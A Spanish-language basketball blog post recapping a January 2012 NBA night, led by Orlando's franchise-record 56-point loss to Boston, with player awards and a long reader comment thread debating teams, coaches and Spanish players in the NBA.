La Crónica: Los Magic se quedan en 56 puntos

24 de January de 2012 por TheDeerHunter

La crisis va por barrios en esta comprimida liga. Las piernas no aguantan la vorágine de tanto partido en tan poco tiempo.

Un día un equipo se siente en la cresta de la ola logrando una victoria de mérito y al siguiente se da un batacazo de récord. Al revés también ocurre y las razones son inescrutables. Da la impresión que los Celtics han tenido que perder la mitad de sus piezas más sensibles para empezar a funcionar. Rondo, Allen y Pietrus fueron baja pero es que Orlando anoche fue el rival que a todos nos gustaría tener. La madre de todas las madres. La caraja mental que llegaron a mostrar los de Florida fue tal que llegaron a defender una posesión con sólo 4 tíos en cancha. Los porcentajes alcanzan un nivel grotesco y el resultado final marca un lamentable récord de la franquicia en 56 puntos anotados (56-87).

Los Grizzlies son ahora mismo los que mejor resisten la montaña rusa y acumulan la mejor racha de victorias. No estuvo fácil mantenerla, pues necesitaron un parcial de 22-39 en el último cuarto para remontar una desventaja de 20 puntos y ganar de 1 (91-90). Claro que enfrente tenían a los Warriors, que también son los amigos de los niños…

Ojo al partidito que se marcaron Parker y Duncan en Nueva Orleans (con clutch incluido del mejor 4 de todos los tiempos) así como la importancia en la rotación que está comenzando a tener Splitter. Actuación digna que ofrecieron los Hornets nuevamente, pero así llevan 3 victorias y 14 dignas derrotas (104-102).

El resto de partidos bastante fáciles para los gallos: Los Wizards se quedaron muy lejos de estrenarse fuera de casa en Philadelphia (83-103); los Bulls no tuvieron problemas con los Nets en la vuelta de Rose (95-110); Oklhoma destrozó a los Pistons (79-99) y los Blazers tampoco sufrieron demasiado ante Sacramento (89-101). Los Rockets ganaron en Minnesotta a pesar del brutal 39-12 de Love (107-92).

Finalmente los Hawks pudieron llevarse la victoria de Milwaukee gracias a un buen último cuarto de Joe Johnson (97-92) y Marion fue el mejor de los Mavs ante sus ex (87-93).

PREMIOS

MVP: ¡Oh, la, la, Tony Parker! El francés repartió 17 asistencias (mejor marca de su carrera) y anotó 20 puntos en la victoria de los Spurs ante los Hornets. Tim Duncan se fue a los 28 puntos con clutch de regalo incluido. Y Kyle Lowry consiguió el segundo triple doble de la temporada (16 puntos, 10 rebotes y 10 asistencias).

Rookie: No han estado muy finos los rookies esta noche. Ricky Rubio asistió en 12 ocasiones pero perdió 5 balones y falló 8 de los 10 tiros que intentó. Brandon Knight estuvo más fino de cara a canasta (13 puntos) pero solo repartió 2 asistencias. También podríamos destacar a Markieff Morris que capturó 11 rebotes y a Jimmer Fredette que anotó 13 puntos.

Sorpresa: La baja de Dirk Nowitzli ha permitido a Ian Mahinmi disfrutar de minutos. En los 29 que jugó ayer se fue a los 17 puntos, 9 rebotes y 3 tapones.

Decepción: 20 puntos en toda la 2ª parte, 56 puntos en total, tan solo 16 canastas en juego… Récords negativos de la franquicia. Los jugadores de Orlando se quedaron en un patético 24’6% de acierto en el tiro con especial mención al 0 de 8 de Ryan Anderson.

Esfuerzo en vano: Otro brutal partido de Kevin Love que se queda sin premio. 39 puntos y 12 rebotes malbaratados. Jarrett Jack también se puede convertir en un habitual de esta sección. Nueva derrota de los Hornets a pesar de los 26 puntos, 6 rebotes y 9 asistencias de su base titular.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

95 comentarios a esta entrada

  1. Javijaen dice:
    #1

    Thanks, Magic Johnson 32

      Citar

  2. Sancho88 dice:
    #2

    Me gustaría ver a Phil en el banquillo y a Spike Lee de asesor. Después de la cantidad de basura que se ha tragado ese hombre durante estos años, no creo que haya nadie mejor que él para ser un asesor en NY… y no sé si lo digo de coña o no, pero vamos, jajajaa, ya cualquier cosa para revivir a ese diplodocus llamado Knickebockers…

      Citar

  3. melo15 dice:
    #3

    Spike Lee es el bajo que siempre va con las gafas, la gorra y la camiseta de Landry Fields jejejjeje

      Citar

  4. Esteban dice:
    #4

    Beasley habia q traspasarlo antes del inicio de temporada donde venia de prom 20 pp y su valor era alto, hoy no vale ni las molestias de traspasarlo, aunque podria ser un sexto hombre interesante en los lakers, heat y algunos mas

    Creo q hoy podria ser cambniado por una primera ronda

      Citar

  5. Esteban dice:
    #5

    Una primera ronda de un equipo de PO, del puesto 15 para arriba

      Citar

  6. Sancho88 dice:
    #6

    OFFTOPIC TOTAL, PERO TENGO QUE DECIRLO. VIVA MIRANDA DE EBRO!!!!!!!!!!!!!!!!!!!!!!!!! QUE GRANDES, POR DIOS

      Citar

  7. Nacho dice:
    #7

    Denise: Dino Meneghin creo que es el al que te refieres. Yo, por mi edad, nunca lo he visto jugar pero si he escuchado algunas de sus “hazañas”

    Había otro, Meneghin era duro pero no tan mamón. Igual me estoy confundiendo y era el bueno de Dino. Molaba verlo, nos jodía a España, y también en la euroliga (como se llamara antes), el bicho llegó a jugar contra su hijo en la liga italiana.

      Citar

  8. simon dice:
    #8

    Esteban:
    Disculpen, por favor repasen el pronostico de los wolves antes del inicio de temporada y la discusion q mantuve donde decia q los wolves debian traspasar a beasley, ridnur entre otros

    Hoy estan buscando realizar esos cambios..

    también vimos tu pronostico sobre Ricky Rubio jejejejeje. Ahora fuera de coñas, yo creo que Beasley acabará siendo un jugador de nivel medio alto e irá de equipo en equipo aspirante al anillo ( siendo importante ), en plan 6 hombre revolucionador o algo por el estilo, eso sí, pero yo he perdido la fe en que se convierta en una estrella

      Citar

  9. kantonyo dice:
    #9

    En un articulo de nuestro amigo John Hollinger en ESPN, cita a las mayores decepciones de la temporada:

    Andray Blatche (Washington) : 16.8 p (2011) a 10.9 p (2012) 38% de tiro
    Wesley Johnson (Minnesota) : No termina de arrancar a pesar de su pick 4
    Lamar Odom (Dallas) : La peor temporada de su carrera. 7 eficiencia de media….
    DeMar DeRozan (Toronto) : Se ha cortado su progresión. 17.2 p (2011) a 14.8 p (2012) 38%, 2,3 perd
    Toney Douglas (New York) : Otro que se ha desinflado: 10.6 p (2011) a 8.7 p (2012) 32%, 2,0 perd
    Jameer Nelson (Orlando) : A pesar de sus 30min/p su peor temporada. 13.1 p (2011) a 8.7 (2012) 2,8 perd
    Stephen Jackson (Milwaukee) : Declive total … 18.5 p (2011) a 12.5 p (2012) 36% de tiro y 3,4 perd
    Luis Scola (Houston) : Yo discrepo pero ahí están los números: 19,6 ef(2011), 12.6 ef (2012) igual minutos
    Devin Harris (Utah) : Fiasco total en Utah: 15.0 p 7.6 a (2011) a 8.1 p 4.5 a (2012) 37% tiro
    Jason Kidd (Dallas) : se está dejando llevar después de su ansiado título, 4 puntos en 30 minutos.
    John Salmons (Sacramento) : Ha viajado al oeste de vacaciones…14.0 p (2011) a 7.1 p (2012) 34%

    Otras menciones para este dudoso premio:
    Tyrus Thomas, Tayshaun Prince, Raymond Felton, Danny Granger, Nene, Grant Hill, Mehmet Okur, Kendrick Perkins , Metta WorldPeace, JJ Hickson, Glen Davis y Deron Williams.

      Citar

  10. Sancho88 dice:
    #10

    Discrepo absolutamente sobre la temporada de Raymond Felton, guiando a los Blazers, con una defensa muy sólida y con un sentido de juego incluso por encima del de Andre la pasada temporada. Pero en general, bastante de acuerdo con el resto.

    Para Vader y Melo, especialmente, y el resto de seguidores de los Knicks, además de los amantes de Gonzalo Vázquez. Compañeros míos de carrera en Valladolid le entrevistan en Onda NBA.

    http://ondanba.ondajovenradio.es/?p=299

    A partir del minuto 30 en adelante. Es una pasada escuchar a este hombre…

      Citar

  11. MagicJohnson32 dice:
    #11

    Lo de Devin Harris es especialmente penoso. Casi me cuesta recordar a aquel base All Star anotador, eléctrico, muy buen defensor, agresivo… Una pena.

    Sobre Tyrus Thomas… ¿cómo puede decepcionarnos? ¿A estas alturas no tenemos todos ya claro que nunca hará nada?

      Citar

  12. Sancho88 dice:
    #12

    Carmelo hace propósito de enmienda y dice el otro día que se va a controlar con los tiros, ok. Hoy solo lleva 7, que relativamente… no es gran cosa. Pero la noticia no puede ser otra que su serie 0 de 7 contra una de las madres de la competición, Charlotte, y su único punto de tiro libre en 27 minutos de juego… Cada vez pienso más que estos Knicks son como el Atleti, es decir, vas allí siendo bueno y sales totalmente devaluado. Que desastre… y menos mal que hoy ha salido al rescate Tyson Chandler, porque si es por el entendimiento de los dos jugones…. En fin

      Citar

  13. Sancho88 dice:
    #13

    Ah,. y Shumpert emulando a su alter ego (al menos, en tiros que se pegan ambos cada noche). 0 de 7 también en tiros de campo. Parece poética la serie de ambos… Shumpert en modo Dezorreando…

      Citar

  14. Sancho88 dice:
    #14

    Y Kemba 20-5-5…. de qué me suena esto? xd

      Citar

  15. Esteban dice:
    #15

    simon: también vimos tu pronostico sobre Ricky Rubio jejejejeje.Ahora fuera de coñas, yo creo que Beasley acabará siendo un jugador de nivel medio alto e irá de equipo en equipo aspirante al anillo ( siendo importante ), en plan 6 hombre revolucionador o algo por el estilo, eso sí, pero yo he perdido la fe en que se convierta en una estrella

    simon, lo de ricky rubio, creo haberlo aclarado, es para pelear a los españoles, si aun no aclare en esta pagina, lo hago ahora, soy de argentina, aqui no pasan ni un solo partido de la liga española de basquet, y ni un solo partido de la euroliga, y nisiquiera un resumen de los juegos, ni como van las clasificaciones y nisiquiera sale en los noticieros deortivos, ni diarios quien es campeon de la liga ni de la euroliga, por lo tanto solo veo a ricky en los mundiales o juegos olimpicos cuando si pasan los partidos de españa, asi q poco puedo hablar de rubia a quien casi no eh visto jugar, jaja y lo digo ahora ricky supera MIS expectativas, q no eran altas… no se q expectativas tendrian en minnesota sobre un top 5 q pasa fogueandose dos años mas en un club como el barsa… no creo q sean iguales a las mias, aunque las debe estar cumpliendo imagino

      Citar

  16. Sancho88 dice:
    #16

    Pues Esteban, a pesar de que nosotros sí hemos podido seguirle con mucha más frecuencia, porque aquí tenemos los partidos de euroliga y acb al alcance del mando, nuestras espectativas con respecto a Ricky no eran tampoco muy altas, para que nos vamos a engañar. Nos ha sorprendido bastante, por el hecho de verle jugar con más soltura y mejor tiro que en Europa. Aquí era un tío acomplejado, que no se atrevía a tirar, que no arriesgaba pases e iba por la cancha cabizbajo la mayoría de las veces. Vamos, más o menos como le pasaba a Jennings. También date cuenta que en el basket FIBA se cierran muchísimo las defensas, al no haber regla defensiva de 3 segundos. Por tanto, para Ricky ahora es mucho más fácil encontrar juego ahí con los pívots o atreverse a penetrar, ya que hay más espacio en la pintura para él que en Europa. Dicen que no hay mal que por bien no venga. Lo dicho, aquí pensábamos que estaba acabado y que iba a fracasar, mayormente. No obstante, detrás de este comentario aparecerá algún visionario diciendo que él si daba un duro por Ricky en la NBA… Las espectativas, por lo general, eran bajas

      Citar

  17. Sancho88 dice:
    #17

    Por cierto, reavivo el debate de ayer a ver si alguien piya el cable y podemos sacar conclusiones. ¿Es Rudy Gay un jugador franquicia para los Grizzlies? ¿Merece cobrar 15 kilos al año? Mi opinión: NO.

    Por cierto, Marc Gasol ha pasado por encima literalmente de Gerald Wallace. Supongo que si Marc Gasol te arrastra, debe ser igual que si te pega Pepe, o algo por el estilo verdad? De veras, creo que le ha dejado mal, en serio

      Citar

  18. Sancho88 dice:
    #18

    declaro mi ODIO PROFUNDO POR LOS BLAZERS. es muy bonito ganar en casa y salir fuera y ser una mierda de equipo. Es que me dan una rabia… defienden como si estuvieran en playoffs. Mi consuelo es que a mejor no pueden ir, porque lo que están haciendo no lo pueden mejorar. Espero que no se metan en Playoffs, les deseo lo peor. Jode ver la NBA y que un equipo defienda. De que cojones van? Puto Nate McMillan, jodido racista. Ni un blanco en el equipo. Y esto último lo digo en serio. Siempre tuve la impresión que discriminaba a Rudy y a Sergio por ser blancos, de veras

      Citar

  19. Sancho88 dice:
    #19

    Ahora hablando en serio, hoy no juegan los grizzlies, hoy juegan los temidos GREMLINS. Si Haddadi no es un gremlin, que alguien me explique que leches es. Un murciélago cebao? De donde ha salido esa cosa? de las centrales iraníes de uranio enriquecido? que se deje barba, al menos, para disimular su propensión a beber lejía por la noche. Dicho esto, hasta la pasada semana habría ido a pelisyonkis a ver gremilins 1, 2 y 3, y después me pondría la versión cutre que salió luego: los CRITTERS!! Pero ya no es posible. Por cierto, alguien jugó el juego de nintendo de los Gremlins? Joder, que jodida pasada.

      Citar

  20. Esteban dice:
    #20

    amigo sancho, comparto tu analisis sobre las defensas, pero tambien creo que la euroliga es las competitiva y compleja que la fase regular de la nba, pues al ser menos partidos y estar mas separados, hay mas preparacion, estafios mas llenos, mayor presion de la gente imagino lo que sera grecia… y mas analisis de como jugar frente a cada rival

    durante la temporada regular de la nba, varios partidos sin de entrenamientos, como los que se juegan en NJ sin publico casi, o canada o similares y a veces a jugar dos o tres dias seguidos el estudio del rival es minimo, como asi tambien las defensas

    durante el lockout, cuantos jugadores nba marcaron diferencias en el mundo? solo rudy que su juego es fiba practicamente y algunos partidos de d-will no muchos mas

      Citar

  21. Esteban dice:
    #21

    tamb a lo que voy, es que quisiera ver al heat en el balaoncesto fiba, con una zona descarada que no le deje entrar a lebron, o frente a lo que en argentina llamos, cajon y uno sobre lebron, marcando a sus tres grandes jugadores y obligandoles a tomar tiros al resto…

      Citar

  22. Vader dice:
    #22

    Jajajaja que grandes, hoy Carmelo un sólo punto y hemos ganado de paliza…. Lo que no hagan los Knicks… 🙂

      Citar

  23. Denise dice:
    #23

    <De que cojones van? Puto Nate McMillan, jodido racista. Ni un blanco en el equipo. Y esto último lo digo en serio. Siempre tuve la impresión que discriminaba a Rudy y a Sergio por ser blancos, de veras

    Este comentario no lo comparto en absoluto.
    ¿que tendrá que ver que no haya ningun blanco para tacharlo de racista?

    Cada uno puede decir lo que quiera y en su derecho está, pero que fácil es culpar a McMillan de que los “españolitos” no triunfan por su culpa. Afortunadamente y en defensa de McMillan, todo el mundo ha visto que Sergio es una bazofia de jugador NBA (demostrado en Portland, Sacramento y New York) habiendo sido entrenado por varios coachs.
    Y Rudy Fernandez tiene calidad pero su mentalidad es la de un niño pequeño consentido, lo que al final, acabará yéndose de los Nuggets al Real Madrid (y los “españolitos” culparan entonces a George Karl)

    McMillan, uno de los mejores coachs de la NBA, que con un equipo siempre plagado de bajas y lesiones los mantiene ahí arriba metidos en Playoffs. Su juego puede gustar más o menos, pero un equipo cogido con alfileres siempre está arriba

      Citar

  24. melo15 dice:
    #24

    Sancho, como puedes odiar a los Blazers!!!!
    Si son el equipo con mas mala suerte del mundo!
    Lo que les a pasado con Roy y Oden es para matarse, y aun asi estan en playoffs

      Citar

  25. Esteban dice:
    #25

    menuda temporada la de bargnani, miren si finalmente termina siendo un gasol, o quien dice, un dirk, madre muchos deberan pedirle disculpas de rodillas a conlangelo

    y hablando de un equipo q no hace ruido como los raptors, creo que colangelo puede ser porximamente un GM del año, a pesar de lo mucho que se le ah criticado

    pensar en este rendimiento de bargnani, jugando de 4, mas la llegada de VALANCIUNAS el proximo año, mas una eleccion top 3 que tendra en el draft, creo que eligira a harrison barnes

    hablamos de un equipo con calderon- derozan-barnes-bargnani-valanciunas, 4 niños y un conductor de nivel, mas espacio en el tope…

    q opinais?

      Citar

  26. Esteban dice:
    #26

    Vader:
    Jajajaja que grandes, hoy Carmelo un sólo punto y hemos ganado de paliza…. Lo que no hagan los Knicks…

    creo que los knicks deben traspasar a carmelo mientras alguiendo siga creyendo que el los puede llevar a ganar, su dupla con stat es de las peores que eh visto, dos jugadores tan similares y tan pocos adaptables al trabajo en equipo da los resultados que vimos, y si la tercer pata de sus 3 grandes es un pivote defensivo, incapcas de anotar a menos que sea por un mate, hablamos de un equipo horrible que pena por entrar a PO

    lo de NY es de lo peor que es visto, gastar todo su presupuesto en dos anotadores compulsivos que no mejoranm a su compañero, liberar y pagar a billups por un pivot bueno, pero que solo sirve para ayudar a un equipo ya armado que solo necesite prescendia en la pintura, pero penoso para CONSTRUIR ALGO A SU ALREDEDOR, y si a eso le sumamos que en la base y el escolta juegan un bibby por el minumo, un baron q volvera de una lesion y una anmistia merecida, un jugador de segundo años seleccion 40 del draft como fields, un rookie seleccion 15 que tira todo, y dos jugadores que van por su carril como douglas y walker, tenemos entonces un equipo horrible

    si jugaran en el oeste no llegarian a PO creo

      Citar

  27. Vader dice:
    #27

    Esteban:

    si jugaran en el oeste no llegarian a PO creo

    Yo no lo creo… estoy seguro…

      Citar

  28. Txusma dice:
    #28

    Sancho88:
    declaro mi ODIO PROFUNDO POR LOS BLAZERS. es muy bonito ganar en casa y salir fuera y ser una mierda de equipo. Es que me dan una rabia… defienden como si estuvieran en playoffs. Mi consuelo es que a mejor no pueden ir, porque lo que están haciendo no lo pueden mejorar. Espero que no se metan en Playoffs, les deseo lo peor. Jode ver la NBA y que un equipo defienda. De que cojones van? Puto Nate McMillan, jodido racista. Ni un blanco en el equipo. Y esto último lo digo en serio. Siempre tuve la impresión que discriminaba a Rudy y a Sergio por ser blancos, de veras

    Lo del racismo me parece una tontería así q obvio esa parte. Sobre la defensa, no lo acabo de entender. Te da rabia que defiendan?

      Citar

  29. TheDeerHunter dice:
    #29

    Denise:

    Cada uno puede decir lo que quiera y en su derecho está, pero que fácil es culpar a McMillan de que los “españolitos” no triunfan por su culpa. Afortunadamente y en defensa de McMillan, todo el mundo ha visto que Sergio es una bazofia de jugador NBA (demostrado en Portland, Sacramento y New York) habiendo sido entrenado por varios coachs.
    Y Rudy Fernandez tiene calidad pero su mentalidad es la de un niño pequeño consentido, lo que al final, acabará yéndose de los Nuggets al Real Madrid (y los “españolitos” culparan entonces a George Karl)

    McMillan, uno de los mejores coachs de la NBA, que con un equipo siempre plagado de bajas y lesiones los mantiene ahí arriba metidos en Playoffs. Su juego puede gustar más o menos, pero un equipo cogido con alfileres siempre está arriba

    Es que las demostraciones, Denise (desde el cariño) tú las haces muy sui generis… a tu rollo según te interese. Pero el colmo es que extrapolas tus particulares conclusiones al resto del personal en plan “todo el mundo ha visto”.
    Lo único que se ha demostrado con Sergio es que, como prácticamente ningún base, no servía para McMillan y su patético Roysistema. En Sacramento lo único que ocurrió es que dos jugadores lo hacían mejor que él en una temporada muy buena de ambos. ¿Qué le puedes reprochar de lo que hizo en Sacramento? y lo de NY es extremadamente anecdótico como para sacar alguna conclusión, pero ya que lo mencionas jugó bastante mejor de recurso esporádico y puntual que Nelson de titular que cobra 35 millones en 4 años… y vaya, que está bastante claro que el ojo de D’Antoni últimamente es cojonudo.
    Corrígeme si me equivoco porque yo no sigo apenas la ACB, pero Sergio está jugando francamente bien en el Madrid ¿no?
    De todas formas vamos, que con eso de “afortunadamente” se te ve todo el plumero.
    Y lo de Rudy… pues parecido. Ahora está lesionado, pero no lo estaba haciendo mal. ¿Qué razones habría para criticar a Karl? Encima el hombre, alucina, consigue que su equipo juegue bien. Algo impensable en otros casos.

    De los Blazers pues que con su pan se lo coman… yo bastante susto me llevé en verano de que se hablara de McMillan como coach para Lakers y hace tiempo que dejé de perder el tiempo con bodrio-partidos que me ofrezca ese. Pocas veces me veréis a partir de ahora pedir su cabeza. Pero a lo que has dicho voy a responder alguna cosa:
    1) Plagado de bajas son dos bajas… opinablemente muy importantes, sí, pero con ellos ha jugado igual de mal (¿o de bien?) que con ellos y los resultados también han sido iguales. Me pregunto dónde estaba escondido Aldridge todos estos años. Habría que preguntarle a él lo agustito que estaba mendigando balones cuando Roy mandaba.
    2) Estar arriba según tú debe de significar llegar a primera ronda y gracias. Supongo que eso es consecuencia de ser fan de Orlando y no de los Lakers. Tema de exigencia y tal… Para mí lo que garantiza McMillan es aquello de resultadismo sin resultados y llevado al extremo, lo peor que puede ofrecer un técnico.
    3) Tendrá nadie narices de quejarse de las plantillas que han disfrutado en Portland, con lesiones o sin ellas. Otra cosa es el aprovechamiento de los jugadores y el desarrollo de los mismos. Pero vamos, que igual me queréis contar que un equipo con Felton-Matthews-Wallace-Aldridge-Camby-Crawford-Batum… gana los partidos por obra y gracia de McMillan.
    Qué cachondo eres, Denise…

      Citar

  30. Denise dice:
    #30

    1- 1- Todo el mundo ha visto quién es Sergo Rodriguez. Un tío que en 5 años en la NBA y en equipos mediocres o sin ninguna gran competencia al lado no hizo absolutamente nada, y ahora en el Madrid no deja de ser mas que un base correcto…cuando juega contra el Ucam Murcia y equipillos de ese nivel.
    2- Lo de Rudy o no has entendido mi comentario o no lo quieres entender. No he dicho que Rudy juegue mal ni que haya que criticar a Karl ni mucho menos. Digo, que en caso de que se acabe marchando al Madrid, cosa bastante probable, muchos “españolitos” acabaran diciendo que es culpa de Karl o del coach que tenga. Tambien se decia que McMillan era culpable de la situación de Rudy en Portland o que el malvado italiano seleccionador de la Roja infrautiliza a Rudy.
    3- Si tu odio hacia McMillan (que no sé de donde viene) te ciega para ver el provecho que le saca a un equipo cogido con pinzas y plagado de bajas pues allá tu.
    La cuestión es que si Phil Jackson gana 11 anillos, no es gracias a que tenía siempre equipazos con Bulls y Lakers, sino a que Tito Phil era el mejor, en cambio si Portland y McMillan pierde partidos y es eliminado en playoffs con un equipo que ya de por si en los ultimos años nunca han sido un Top 3 y encima siempre plagado de bajas, la culpa si es de McMillan.

    4- No entiendo la rabia que tienes últimamente contra Orlando y Nelson en particular, y la gracia es que siendo de Lakers tampoco puedes sacar pecho de tu base ni de tu equipo en estos momentos (y no me saques los anillos y bla bla , que estamos en 2012)

    Que cachondo eres Deer..

      Citar

  31. MagicJohnson32 dice:
    #31

    Los que se pelean, se desean xDDD

      Citar

  32. Sancho88 dice:
    #32

    Esteban:
    amigo sancho, comparto tu analisis sobre las defensas, pero tambien creo que la euroliga es las competitiva y compleja que la fase regular de la nba, pues al ser menos partidos y estar mas separados, hay mas preparacion, estafios mas llenos, mayor presion de la gente imagino lo que sera grecia… y mas analisis de como jugar frente a cada rival

    durante la temporada regular de la nba, varios partidos sin de entrenamientos, como los que se juegan en NJ sin publico casi, o canada o similares y a veces a jugar dos o tres dias seguidos el estudio del rival es minimo, como asi tambien las defensas

    durante el lockout, cuantos jugadores nba marcaron diferencias en el mundo? solo rudy que su juego es fiba practicamente y algunos partidos de d-will no muchos mas

    Jeje, bueno, ahí discrepo. Nico Batum se marcó partidazos de más de 40 de valoración, al igual que Kirilenko. En general rindieron bastante bien. También Sonny Weems en Kaunas, a pesar de que era agente libre y no firmó finalmente. Lawson la cagó, pero Green lo hizo muy bien en Eslovenia, Gallinari regularcillo en Milan…. en general el impacto fue muy bueno, excepto Dragic, Reggie Williams, Seraphin y Dorsey con Dusko Ivanovic, por supuesto, que les jodió a todos. Casi era más difícil que todos fracasaran a que alguno de ellos hiciera algo… Luego Splitter tb jugó de vicio en Valencia, Eyenga mierda en Badalona… no sé, hubo de todo como en botica, pero ya te digo que en general muy buen impacto y recibimiento, y la Euroliga estuvo muy guapa en la primera fase con los partidos de CSKA y Real Madrid, sobre todo

      Citar

  33. Sancho88 dice:
    #33

    Esteban:
    menuda temporada la de bargnani, miren si finalmente termina siendo un gasol, o quien dice, un dirk, madre muchos deberan pedirle disculpas de rodillas a conlangelo

    y hablando de un equipo q no hace ruido como los raptors, creo que colangelo puede ser porximamente un GM del año, a pesar de lo mucho que se le ah criticado

    pensar en este rendimiento de bargnani, jugando de 4, mas la llegada de VALANCIUNAS el proximo año, mas una eleccion top 3 que tendra en el draft, creo que eligira a harrison barnes

    hablamos de un equipo con calderon- derozan-barnes-bargnani-valanciunas, 4 niños y un conductor de nivel, mas espacio en el tope…

    q opinais?

    Calderón ha dicho que se quiere ir, y a parte yo no espero que DeRozan se convierta en un jugador muy muy importante. Tiene demasiadas carencias. Sobre Bargnani, ya era hora que fuera demostrando parte de ese jugador total que decían cuando fue Número 1 del Draft. Las comparaciones con Nowitzki le han hecho mucho daño en sus primeros años. Va en franca mejora, pero su principal tara es la defensa. Necesitaría un Ibaka o un Marc Gasol al lado para ser verdaderamente temible. Con Aaron Gray… como decirlo…. no hay nivel, xd. Valanciunas lo está haciendo muy bien en Europa, esperemos que cuando vaya a la NBA tenga un gran impacto. Yo creo que sí, y que jugadores como él y Nikola Vucevic dominarán la liga en próximos años. Ya lo dije de Kevin Love cuando nadie daba un duro por él, y el señor Ramón Trecet me respondió en su blog que Love tenía que tomar muchos platos de garbanzos para ser alguien importante en la NBA. Siempre me acuerdo de aquello y me hace gracia las sobradas que se mete ese señor, que se piensa que lo sabe todo. En fin…

      Citar

  34. TheDeerHunter dice:
    #34

    Vayamos por partes, Denise, que se te va la pinza…

    Para empezar Orlando es uno de mis equipos favoritos del Este. Utilizo tu equipo como punto de referencia para según qué debates contigo, pero manía ni remotamente. Nelson sí te reconozco que no me gusta, pero como no me gustan otros sin más. Concretamente me parece una de las causas por las que Orlando no tiene anillo, pero ni rabia, ni manía…
    Y, con tu permiso, lo vuelvo a seguir utilizando para enfocar tus comentarios sobre Sergio:
    – Nelson’11-12: 8.3ptos (39.2%TC), 5.4asis, 2.4reb… en 29.7 minutos
    – Sergio’09-10 (NY): 7.4ptos(49.1%FG), 3.4asis, 1.1reb… en 19.7 minutos
    Te puedes hartar a descontextualizar la carrera de Sergio. A McMillan no se le criticó por no dejar jugar a Sergio (que no le dejó) sino porque lo maltrató de manera incomprensible hasta destruir su esencia como jugador. Puedes revisar los games log de aquella época y verás que los minutos asignados eran una jodida ruleta rusa, que ocasionalmente le daba 20 minutos y el chaval lo hacía bien pero los 5 siguientes no le daba ni 5, para sacar un Blake que aportaba apenas nada. Eso sin contar que a McMillan la figura del base se la ha trufado siempre bastante cuando tenía a Roy, mucho menos del perfil de Sergio. Podemos imaginarnos todos qué es lo que hubiera pasado con Ricky allí, no hace falta ser un visionario.
    Después, si quieres me comentas dónde diantres has visto en este blog o en ningún medio mundial que se haya criticado a Westphal o a D’Antony por no sacar a Sergio. Es que al final, ese chauvinismo que pretendes denunciar con este caso es al contrario… para que luego me acuses de odios que no son tal.

    Y por último, ese odio a McMillan que dices tengo es un odio a una figura, a un concepto baloncestístico que él representa y que yo ya he explicado detalladamente en este blog en infinitas ocasiones (se puede consultar) Para discutir si soy objetivo o no con él puedes rebatir los argumentos que yo lanzo en su contra, pero no acusarme de un odio visceral así porque sí, porque es que no lo tengo. La verdad es que más allá de cuando hablo de baloncesto con vosotros me la trufa infinitamente el fulano en cuestión. Tampoco me pidas que le declare simpatía.
    Dices que es una plantilla cogida por los pelos… pues podemos revisar los pronósticos y los comentarios del análisis si tú quieres, a ver qué es lo que espera la gente de este equipo. Ya no aquí sólo… te invito a que lo revises en los medios especializados en general. Diría que es un equipo que habrá que valorar al final de los playoffs, donde todo el mundo espera que estén.

      Citar

  35. Sancho88 dice:
    #35

    Txusma: Lo del racismo me parece una tontería así q obvio esa parte. Sobre la defensa, no lo acabo de entender. Te da rabia que defiendan?

    Bueno, lo del racismo es una chorrada, jajaja. Cierto. Pero a ver, aquí hay defensa y defensa. Los Bulls también defienden de puta madre, y juegan de puta madre. No es sinónimo defender bien con jugar amarrategui y aburrido, y así juegan los Blazers. Simplemente, se dedican a jugar de cara a la galería, para que los bulliciosos aficionados del Rose Garden aplaudan sus canastas. Estoy convencido al 100 por cien. Lo llevo viendo toda la vida. Es en plan… me casco el triple para escuchar la ovación del público, que prácticamente ovacionan hasta los tiros libres. Es así. Lo único divertido de ver un partido de los Blazers es ver al ‘Guy of free throws”. Ese hombre detrás de la canasta hace que los partidos merezcan la pena únicamente por verle a él, pero yo digo que son un equipo de mentira, que deberían aspirar a mucho más que estar 10-8 CON EL EQUIPAZO QUE TIENEN. todo el mundo mataría por tener esa plantilla, y qué poco la aprovecha McMillan. En serio, a mí me desespera mucho el juego de Blazers, y excepto por la profesionalidad de Raymond Felton y Gerald Wallace, y lo jugón que es Aldridge (al que por cierto, los árbitros tienen muy mimado, igual que David Lee), el resto del equipo es mentira. Wes y Crawford fuera de casa se borran, porque no hay nadie que aplauda sus canastas. Camby se va arrastrando el hombre, pero es lo que hay. No sé, no me molan nada, en serio. Y ya digo que a mí no me molesta que defiendan, sino que jueguen de forma asquerosa y amarrategui, a la griega, como diría Esteban

      Citar

  36. MagicJohnson32 dice:
    #36

    Sancho, aseguras que los Blazers tienen un EQUIPAZO y dos líneas más abajo casi salvas sólo a Felton, Wallace y Aldridge xDD No sé, chico, hay equipos mucho más amarrateguis que los Blazers.

      Citar

  37. Sancho88 dice:
    #37

    Yo no soy ningún amante del Chacho, sobre todo porque me parece que fue muy precipitado yéndose tan joven a la NBA. Creo que en España aún no era una estrella, y que si llega a quedarse una o dos temporadas más, ahora mismo apuesto lo que queráis a que seguiría en la NBA. Pero hay que recordar que sin él ahora mismo seguiríamos siendo baloncestísticamente hablando un país descastado, sin el premio gordo que fue aquel mundial de Japón. Y si no, preguntadle a Esteban qué sintió con el roto que les hizo el Chacho en el último cuarto. También con aquel triple de Nocioni, jejejej, que menos mal que no entró. Y digo una cosa, ese partido Argentina lo supo leer como mil veces mejor que España, y salió Chacho Rodríguez a resolver por su cuenta y riesgo, al igual que el otro día contra el Barsa en el derby. El tío tiene calidad como para desbordar un río, lo que le pasa es que su concepto baloncestístico es el de Jason Williams, siempre el espectáculo y la técnica individual por encima de los sistemas. Eso en Estados Unidos le molaba hacerlo, y realmente no era nada ineficaz, lo que pasa es que no defendía ni una mierda, y cuando salía en NY, Sacramento o Portland, su ratio +/- era de -10 mínimo, xd. Pero no estoy nada de acuerdo en decir de él que es poco menos que un paquete y que McMillan nos lo demostró. Ya digo, que McMillan lo único que demuestra es que no le gusta agradar a los aficionados al baloncesto con su mierda de concepción del juego

      Citar

  38. Sancho88 dice:
    #38

    MagicJohnson32:
    Sancho, aseguras que los Blazers tienen un EQUIPAZO y dos líneas más abajo casi salvas sólo a Felton, Wallace y Aldridge xDD No sé, chico, hay equipos mucho más amarrateguis que los Blazers.

    En casa sí, tienen un equipazo. Fuera solo salvo a estos que te digo. Puntualizo para que así se entienda mejor

      Citar

  39. Jose Luis dice:
    #39

